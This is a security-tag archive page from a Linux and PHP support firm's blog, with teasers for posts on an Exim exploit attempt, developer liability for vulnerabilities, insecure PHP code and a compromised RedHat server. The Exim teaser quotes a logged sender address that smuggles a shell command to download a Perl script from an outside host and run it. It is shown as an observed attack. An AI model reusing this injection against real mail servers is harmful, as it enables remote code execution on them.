Linux and PHP web application support and development (Bromsgrove, UK)

tel: 0845 0046746

security

Today’s most interesting email (exim, security)

Aside from generally getting too much email, today this gem arrived …. Presumably there is/was a vulnerability in Exim. Thankfully this server runs Postfix. Jun 18 23:47:47 xxxx postfix/cleanup[727]: 718FF848036: message-id=<> Jun 18 23:47:47 xxxx postfix/qmgr[1444]: 718FF848036: from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}radioactivefrog.com/.x/exim.txt“perl${IFS}/tmp/p.pl`@blaat.com>, size=206, nrcpt=1 (queue active)

, , ,

Read more...

Being sued for security holes?

TechRepublic have an interesting article covering whether Software Developers should face legal action if their coding results in (presumably exploited) security vulnerabilities. Given that most security breaches result in data loss (for individuals) – fines from the ICO ought to be relevant – Tesco being investigated by the ICO Belfast NHS Trust fined £225,000 by the […]

,

Read more...

Insecure PHP Code?

Recently on the PHP NorthWest mailing list, there has been some discussion over the causes of security vulnerabilities within PHP applications. The original poster provided a questionnaire – however, this didn’t really allow for much in the way of a detailed answer, so here’s our 2 pence. As a caveat: there are obviously other causes…. […]

, , ,

Read more...

A quick overview of a compromised Linux system

Some time ago, a new customer approached us (thanks to a referral from Bytemark); they were using a virtual machine to host their website. The machine itself was RedHat 9 (from 2003ish) and was used to take online bookings for events. Here’s a summary of what we found, which may prove to be interesting/useful for […]

, ,

Read more...